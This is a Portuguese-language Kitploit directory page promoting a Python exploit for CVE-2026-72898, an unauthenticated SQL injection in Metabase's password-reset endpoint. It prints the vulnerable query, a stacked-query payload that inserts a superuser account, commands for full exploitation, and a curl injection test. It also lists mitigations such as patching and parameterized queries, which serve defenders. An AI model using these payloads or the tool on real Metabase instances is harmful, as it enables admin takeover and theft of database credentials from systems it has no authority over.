Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-72898 — Exploit em Python para CVE-2026-72898, uma injeção SQL não autenticada no endpoint de redefinição de senha do Metabase que cria contas de administrador e extrai credenciais do banco de dados. | Kitploit
Ferramentas/GitHubGitHub/34zy/cve-2026-72898
Scanners de VulnerabilidadesAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-ExploraçãoSegurança WebTestes de PenetraçãoRed TeamingSegurança de Banco de Dados
GitHub34zy/cve-2026-72898

CVE-2026-72898

Exploit em Python para CVE-2026-72898, uma injeção SQL não autenticada no endpoint de redefinição de senha do Metabase que cria contas de administrador e extrai credenciais do banco de dados.

há 6h 14mAinda não revisado
Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Metabase SQL Injection RCE

CVSS 10.0 CRITICAL EXPLOITED NO AUTH

Exploitation Demo

Injeção de SQL não autenticada no endpoint /api/session/reset_password do Metabase. Cria contas de administrador e extrai credenciais do banco de dados.

Afetado: v58.0 - v63.3 | Corrigido: v58.24+, v59.21+, v60.17+, v61.11+, v62.9+, v63.5+


Início Rápido

root@kitploit:~
pip install flask requests
python3 CVE-2026-72898.py http://localhost:5000 --check

A Vulnerabilidade

Concatenação de strings na consulta SQL:

root@kitploit:~
# Vulnerable code
query = f"SELECT * FROM core_user WHERE email='{email}'"

Payload do ataque:

root@kitploit:~
'; INSERT INTO core_user (email, password, is_superuser) VALUES ('admin@hack', 'hash', 1); --

Uso

Apenas verificação (sem modificação):

root@kitploit:~
python3 CVE-2026-72898.py http://localhost:5000 --check

Exploração completa:

root@kitploit:~
python3 CVE-2026-72898.py http://localhost:5000 -e [email protected] -p Password123!

Teste manual:

root@kitploit:~
# Verify endpoint
curl http://localhost:5000/api/health

# Test SQLi
curl -X POST http://localhost:5000/api/session/reset_password \
  -H "Content-Type: application/json" \
  -d '{"email": "'"'"' OR '"'"'1'"'"'='"'"'1"}'

O Que Ele Faz

  1. Detecta a instância do Metabase (SQLi baseada em booleano)
  2. Cria usuário administrador via injeção de SQL
  3. Autentica com o novo administrador
  4. Extrai credenciais do banco de dados conectado
  5. Verifica o comprometimento total do sistema

Impacto

  • Acesso administrativo não autenticado
  • Extração de credenciais do banco de dados
  • Comprometimento do banco de dados conectado
  • Controle total da aplicação

Mitigação

AGORA:

  • Atualize para a versão corrigida
  • Bloqueie /api/session/reset_password via WAF
  • Audite contas de administrador em busca de adições não autorizadas
  • Rotacione todas as credenciais do banco de dados

DEPOIS:

  • Use consultas parametrizadas
  • Adicione validação de entrada
  • Implemente autenticação em todos os endpoints sensíveis
  • Habilite o registro de consultas SQL

Links

  • GitHub Advisory
  • NVD CVE Entry

Apenas para uso autorizado. Acesso não autorizado é ilegal.

Baixar ferramenta